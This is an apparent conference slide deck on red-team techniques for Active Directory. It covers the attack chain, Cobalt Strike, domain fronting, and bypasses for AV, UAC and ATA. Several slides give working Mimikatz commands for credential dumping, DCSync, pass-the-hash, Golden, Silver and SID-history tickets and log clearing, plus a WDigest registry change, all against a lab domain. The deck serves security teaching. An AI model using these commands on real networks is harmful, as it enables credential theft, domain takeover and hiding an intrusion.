This document discusses red team techniques for expanding access within an Active Directory environment. It begins with introductions and defines red teaming as adversary emulation. It outlines a red team vs blue team approach and discusses setting up red team infrastructure. The document then covers various techniques for each step of a red team attack chain including gaining initial access, escalating privileges, lateral movement, and maintaining persistence. Specific tools and tactics are demonstrated like BloodHound, Mimikatz, and Golden Ticket attacks. Defense techniques like SIEM, logging, and threat intelligence are also briefly mentioned. The presentation ends with a question and answer section and credits contributors in the security field.

1. Red Team Techniques
or how to expand your Empire in
Active Directory Environment
Guglielmo Scaiola
MCT – MCSE – CEI – CEH – CHFI – ECSA – GPEN - ISO 27001 L.A. – Security +
mail: gs@miproparma.com
Twitter: @S0ftwarGS
Blog: S0ftwarGS.com

2. Who am I?
• Security Consultant e Ethical Hacker
• Red Teamer e Penetration Tester
• Microsoft System Engineer – A.D. expert
• Incident Handling & Enterprise Forensics
• Trainer & Speaker
Guglielmo «S0ftwar» Scaiola
MCT – MCSE – CEI – CEH – CHFI – ECSA - GPEN - ISO 27001 L.A. – Security +
mail: gs@miproparma.com Twitter: @S0ftwarGS Blog: S0ftwarGS.com

3. AGENDA
• Intro
• Red Team Vs. Blue Team
• Red Teaming Infrastructure
• Play the Game
• Defense
• Q & A

4. Red Teaming: my view
• What is for me?
– Adversary Emulation
– Custom Exploit Dev

5. Red Team Vs. Blue Team
Red Team & Blue Team Collaboration

6. Red Teaming Infrastructure
https://posts.specterops.io/designing-effective-covert-red-team-attack-infrastructure-767d4289af43

7. Are you saying me that exist one tool for automating all of this????

8. My name is : ...CobaltStrike

9. Red Team Attack Chain
• Gain Access
– Spear Phishing [Malware (trojan...) / Client Side Exploit]
• Gain Situational Awareness
– Powershell/admin tools & commands
• Escalation
– Local User/Domain User Local Admin with UAC/Domain User
– Local Admin with UAC/Domain User Local Admin Bypass UAC/Domain User
– Local Admin Bypass UAC/Domain User Domain Admin
• Explore Network & Lateral Movement (loop To Situational Awareness)
• Persistence
– Backdoor
• Access & Egress Data
• Extraction

10. OSINT – (pre – Attack)

11. Malware Vs. Client Side Exploit
Malware
Pro
• S.O. Agnostic
• Arch Agnostic
Cons
• File
Client Side Exploit
Pro
• Fileless (sure???)
• In-memory
Cons
• Specific for SO/app version

12. ByPass AV - ByPass Proxy

13. URL filtering Vs. Domain Fronting
https://www.bamsoftware.com/papers/fronting/
https://github.com/rvrsh3ll/FindFrontableDomains
https://www.youtube.com/watch?v=IKO1ovl7Ky4&t=6s

14. Gain Situational Awareness

15. BloodHound

16. Priv Escalation
Ms16-032
https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1

17. Bypass UAC
https://github.com/hfiref0x/UACME

18. DEMO TIME

19. Abuse Terminal Server Session

20. Ms14-068 kekeo
https://github.com/gentilkiwi/kekeo/releases

21. Dump plaintext password

22. Dump plaintext password???

23. Back to the future
https://www.trustedsec.com/2015/04/dumping-wdigest-creds-with-meterpreter-mimikatzkiwi-in-windows-8-1/
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1

24. Dump local Hash DB
lsadump::lsa /inject /name:krbtgt
lsadump::lsa
lsadump::lsa /patch

25. 25
DSRM Password
https://technet.microsoft.com/en-us/library/cc732714(v=ws.10).aspx
HKLMSystemCurrentControlSetControlLsaDSRMAdminLogonBehavior

26. DCSync
DCSync:
1) Discovery DC
2) Query replicate the user cred via GetNCChange
Lsadump::dcsync /domain:child1.newtest.lab /user:child1krbtgt

27. Mimikatz – over-pass-the-hash
sekurlsa::pth /user:admin2 /domain:child1.newtest.lab /ntlm:a87f3a337d73085c45f9416be5787d86

28. Silver ticket
Is a TGS: no communication with the DC , but the account computer password is changing every 30 days
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNetlogonParametersDisablePasswordChange = 1
kerberos::golden /admin:fakeuser /id:666666 /domain:child1.newtest.lab /sid:S-1-5-21-1286882215-52109606-
1499245918 /target:dc012k12r2.child1.newtest.lab /rc4:84dc6e3f0de5d9788da6529b4f79b2c6 /service:cifs /ptt
ON DC : HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNetlogonParametersRefusePasswordChange = 1
HKLMSYSTEMCurrentControlSetServicesNetLogonParametersMaximumPasswordAge

29. Mimikatz –
Golden Ticket
kerberos::golden /admin:fakeuser /id:666666 /domain:child1.newtest.lab /sid:S-1-5-21-1286882215-52109606-
1499245918 /target:dc012k12r2.child1.newtest.lab /rc4:84dc6e3f0de5d9788da6529b4f79b2c6 /ptt

30. 519:
Active
Directory
Persistence
con SID History
kerberos::golden /admin:fakeuser /id:666666 /domain:child1.newtest.lab /sid:S-1-5-21-1286882215-52109606-1499245918
/target:dc012k12r2.child1.newtest.lab /rc4:84dc6e3f0de5d9788da6529b4f79b2c6 /groups:513,512,520,518 /sids: S-1-5-21-655507452-
925574031-147420587-519 /ptt

31. Skeleton key
31

32. Malicious Security Provider
HKLMSystemCurrentControlSetControlLsaSecurity Packages

33. AdminSDHolder

34. AdminSDHolder

35. Process Doppelgänging – a new way to
impersonate a process

36. Clearing Track with Mimikatz 2.1.1 20171220
• event::drop
• event::clear

37. Powershell without powershell –
bypass Device Guard

38. ByPass W10 security enhancement
• AMSI
• Autologging
• Windows Defender SmartScreen
• Device Guard
• Windows Defender Antivirus
• Credential Guard
• Device Guard

39. LAPS - Local Administrator Password Solution
https://technet.microsoft.com/en-us/mt227395.aspx

40. LAPS - Get-AdmPwdPassword

41. The winner is….ATA

42. Some ATA Bypass Techniques
ATA can’t win if:
• The protocols are correctly implemented
• ATA can’t see how the ticket (or request) are built
• ATA can’t see the traffic with his agents

43. Bypass 1 - OverPassTheHash
sekurlsa::pth
/user:MyUser /domain:MyDomain
/aes256:aes256 /ntlm:ntlm /aes128:aes128"‘
sekurlsa::pth /user:admin2 /domain:child1.newtest.lab
/ntlm:92937945b518814341de3f726500d4ff
/aes256:cc057a204bb4aad41694a58f495b0834118599d76c7a66b0326cb250a9c46f8f
/aes128:d4a5dd3dce09a0e031c114fdd7e8094c

44. Bypass 2 – Golden Ticket
kerberos::golden /User:MyUser /domain:MyDomain
/sid:S-1-5-21-3270384115-3177237293-604223748
/aes256:aes256krbtgt /id:1000
/groups:512,513,518,520 /ptt"‘
Golden with AES keys can be generated from any
machine unlike restrictions in case of Over-PTH.

45. WPC2017 45

46. DEMO TIME

48. We must never arrive at
"certain conditions"!
Under certain conditions every
security countermeasure can
by bypassed ... So?

49. Defense in depth

50. SIEM, logging e Threat Intelligence

51. Q & A

52. Credits
• SpecterOps:@SpecterOps
– Matt Graeber: @mattifestation
– Will Schroeder: @harmj0y
– Raphael Mudge: @ArmitageHacker
– Andrew Robbins: @_wald0
– Matt Nelson: @Enigma0x3
• Benjamin Delphi: @gentilkiwi
• Sean Metcalf: @PyroTek3